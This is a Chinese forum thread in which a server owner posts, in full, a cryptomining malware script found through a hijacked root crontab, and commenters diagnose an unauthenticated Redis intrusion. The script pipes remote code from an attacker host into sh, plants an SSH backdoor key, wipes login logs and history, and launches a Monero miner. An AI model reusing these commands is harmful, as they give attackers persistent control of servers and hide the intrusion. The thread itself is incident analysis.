这是一个创建于 2743 天前的主题,其中的信息可能已经有所发展或是发生改变。
系统 centos7
今天看到服务器报警 68%的 cpu 被用。我也没干嘛啊。 用 htop 看到如下: 
很浪啊,赶紧 kill -9 杀掉进程,单一下子就有起来了。 灵光一闪,查看 crontab,如图: 
用 crontab 里的链接下载了这个 sh:
#!/bin/bash ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep kworkers | grep -v grep | awk '{print $2}' | xargs kill -9 skill -KILL udevs skill -KILL kworkers rm -rf /var/lib/apt/lists/* apt-get update apt-get install wget -y apt-get install libcurl4-openssl-dev -y apt-get install python-pip -y apt-get install ca-certificates -y apt-get install redis-tools -y apt-get install python gcc -y apt-get install python-setuptools python-dev build-essential -y --allow-unauthenticated yum -y install epel-release yum -y install wget gcc redis git python-pip ca-certificates echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/root echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs mkdir -p /root/.ssh/ echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/crontabs/root echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/crontabs/root echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys PS3=$(iptables -L | grep 6379 | wc -l) if [ $PS3 -eq 0 ]; then yum -y install iptables-services iptables -I INPUT 1 -p tcp --dport 6379 -j DROP iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT service iptables save /etc/init.d/iptables-persistent save fi echo "" > /var/log/wtmp echo "" > /var/log/secure history -c if [ ! -f "/tmp/migrations" ];then wget https://transfer.sh/SstPD/clay --no-check-certificate -O /tmp/clay && chmod +x /tmp/clay wget https://transfer.sh/q4oJN/nodexx --no-check-certificate -O /tmp/migrations && chmod 777 /tmp/migrations curl -sk https://transfer.sh/q4oJN/nodexx -o /tmp/migrations && chmod 777 /tmp/migrations fi cd /tmp PS1=$(ps aux | grep clay | grep -v "grep" | wc -l) if [ $PS1 -eq 0 ]; then /tmp/clay & fi PS2=$(ps aux | grep migrations | grep -v "grep" | wc -l) if [ $PS2 -eq 0 ]; then /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B fi if [ $? -ne 0 -a $PS2 -eq 0 ]; then wget https://transfer.sh/pQMdB/glibc-2.14.tar.gz --no-check-certificate -O /tmp/glibc-2.14.tar.gz && tar zxvf /tmp/glibc-2.14.tar.gz -C / && export LD_LIBRARY_PATH=/opt/glibc-2.14/lib:$LD_LIBRARY_PATH && /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B && echo "" > /var/log/wtmp && echo "" > /var/log/secure && history -c fi if [ $PS3 -eq 0 ]; then yum -y install iptables-services iptables -I INPUT 1 -p tcp --dport 6379 -j DROP iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT service iptables save /etc/init.d/iptables-persistent save fi 各位猜猜他是不是要挖矿。 我现在只是把外网用防火墙给卡断了,想仔细研究研究他到底在干嘛
 | 1 dengshuang OP  3 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys 这一条很是邪恶啊 |
 | 2 henryshen233 2018-04-16 14:40:23 +08:00 @dengshuang 拽了 |
| 3 henryshen233 2018-04-16 14:40:33 +08:00 我说一楼 |
 | 4 u5f20u98de 2018-04-16 14:42:55 +08:00 1 看样子的确是被拿来挖矿了,看命令是用了一个未授权访问的 redis 漏洞(因为替你把 6379 关上不让别人搞) |
 | 5 hcymk2 2018-04-16 14:44:10 +08:00 1 xmr 门罗币 |
 | 6 doun 2018-04-16 14:46:45 +08:00 via Android 1 pool.zer0day.ru:8080 这个好像是挖矿的。找到漏洞了吗怎么被搞的? |
 | 7 raslan 2018-04-16 14:46:46 +08:00 被拿来挖矿了 |
 | 8 Felldeadbird 2018-04-16 14:49:12 +08:00 @u5f20u98de 良心黑产脚本? |
 | 9 murusu 2018-04-16 15:00:09 +08:00 2 被人拿来当矿机了 很奇怪的是你这机子允许 root 帐号远程登录? |
 | 10 bearqq 2018-04-16 15:01:11 +08:00 via Android Stratum 字样挖矿无疑 有可能是 ssh 密码破解搞进来的,别的弱密码也可能,1day 漏洞也可能看你更新不。 |
 | 11 jasonyang9 2018-04-16 15:02:27 +08:00 2 ``` /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B ``` 还保留了 15%CPU 给你用,良心啊 |
| 12 hcymk2 2018-04-16 15:06:42 +08:00 echo "" > /var/log/wtmp echo "" > /var/log/secure history -c |
 | 13 geagerg 2018-04-16 15:09:31 +08:00 1 见过个类似的,看看是不是 redis 开了外网访问但是没设密码或者弱密码或或者配置文件有误未生效 |
| 14 dengshuang OP 1 @murusu 不是这是内网的电脑,当时通过代理,把 6379 端口 redis 代理出去了。redis 是用 root 运行的。 |
| 15 dengshuang OP @jasonyang9 尴尬,哈哈 |
 | 16 EXE 2018-04-16 15:14:34 +08:00 1 前几天服务器刚中了挖门罗币的病毒,而且用的还是 docker 来跑的。。。 |
17
jingdaihuaxia 2018-04-16 15:15:03 +08:00 被挖矿了?
| 18 u5f20u98de 2018-04-16 15:20:38 +08:00 @Felldeadbird 不是良心,是怕被别家黑客工具用了,竞争也很激烈啊。 |
 | 19 4ever911 2018-04-16 15:22:23 +08:00 我前几天配置的 SS 也被黑了用作 ddos,客服发 email 说关停了我的机器,我上去一看,几个小时打了 300G 流量。。。。。 也不知道是如何黑的,后来果断重新弄了一台,关了 root 远程登录,关闭密码登陆。 |
 | 20 nicevar 2018-04-16 15:42:58 +08:00 估计是 ssh 被爆破进入的 |
 | 21 Rootcat 2018-04-16 15:44:15 +08:00 看了这个,我竟然想到的是拿我闲置的服务器来挖门罗币,不知道能挖多少。。。 |
 | 22 lopetver 2018-04-16 15:45:10 +08:00 |
 | 23 kongkongyzt 2018-04-16 15:47:11 +08:00 @dengshuang #1 +1, 刚想回这个, 这条 hhh |
| 24 lopetver 2018-04-16 15:57:17 +08:00 @kongkongyzt 求解这条是什么意思 |
 | 25 FindBoyFriend 2018-04-16 16:01:56 +08:00 一项喜欢用 keys 登陆 ssh,就差两步验证了 |
 | 26 f2f2f 2018-04-16 16:13:32 +08:00 @jasonyang9 然而即便留了 15% 很多商家还是会直接把这样的 vps 给 suspend 了 #滑稽 |
| 29 dengshuang OP @lopetver 免密码 登陆 |
 | 30 airycanon 2018-04-16 16:53:54 +08:00 你是不是用 root 启动 redis 了并且对外网是开放的? |
 | 31 sdzwb 2018-04-16 16:56:48 +08:00 这是服务器被入侵,同时用于挖矿的步骤啊。 要杜绝还得找服务器漏洞的根源,然后再去堵。 |
 | 32 YMB 2018-04-16 17:10:16 +08:00 前段时间研究过 redis 漏洞,但新版本貌似怎么都不能生效,楼主 redis 版本是多少? 有可疑 key 之类的一些信息吗,有的话麻烦提供一下大家研究研究 |
 | 33 ZackB0T 2018-04-16 17:15:41 +08:00 via Android 最简单的方式,云墙 设置下 ssh 端口么? ip 或者 IP 段放行。 挖门罗的 打算挖的,给你个参考,G620 CentOS 核算力 50,如果支持 aes 能快不少。但是 cpu 自己挖电费回不来,矿池一般 0.3 提,这算力基本一年提不出来。 |
 | 34 YumeMichi 2018-04-16 18:21:36 +08:00 让我想起我司一台测试服务器上的 redis 没有设置密码 然后因为版本也不是最新的 就被人利用漏洞种过挖矿程序 |
 | 35 Miy4mori 2018-04-16 18:50:45 +08:00 @Felldeadbird 你怎么理解到良心的,明显怕后来人把自己蹬了啊。 |
 | 36 jeffson 2018-04-16 19:11:16 +08:00 stratum+tcp://pool.zer0day.ru:8080 必然是挖矿啊 |
 | 37 lusi1990 2018-04-16 19:28:29 +08:00 via Android 我也被黑锅,cpu 占用了 100% |
 | 38 DeWhite 2018-04-16 20:06:31 +08:00 @jasonyang9 我之前查日志菜发现 只被用了 50%,这不算良心 |
 | 39 projectzoo 2018-04-16 23:03:32 +08:00 @dengshuang #1 有点意思,这个。。 |
 | 40 msg7086 2018-04-17 00:00:43 +08:00 无密码全球公开 root 账户运行的 redis,不拿来挖矿难道还留着过年? |
 | 41 defunct9 2018-04-17 06:16:19 +08:00 via iPhone 挖门罗币种的 开 ssh,让我上去也挖挖 |
 | 42 winglight2016 2018-04-17 10:59:30 +08:00 一般 VPS 都会禁止挖矿的 |
| 43 henryshen233 2018-04-17 11:24:12 +08:00 @4ever911 上次我的 Linode 也流量暴涨,后来只开放必要端口就好了 |
 | 44 xiayun 2018-04-17 16:09:33 +08:00 挖矿的,应该是利用 redis 端口漏洞进来的,因为 redis 默认是不用用户密码的 |
 | 45 infra 2018-04-19 08:38:37 +08:00 被偷挖挖门罗币了 |
Select Language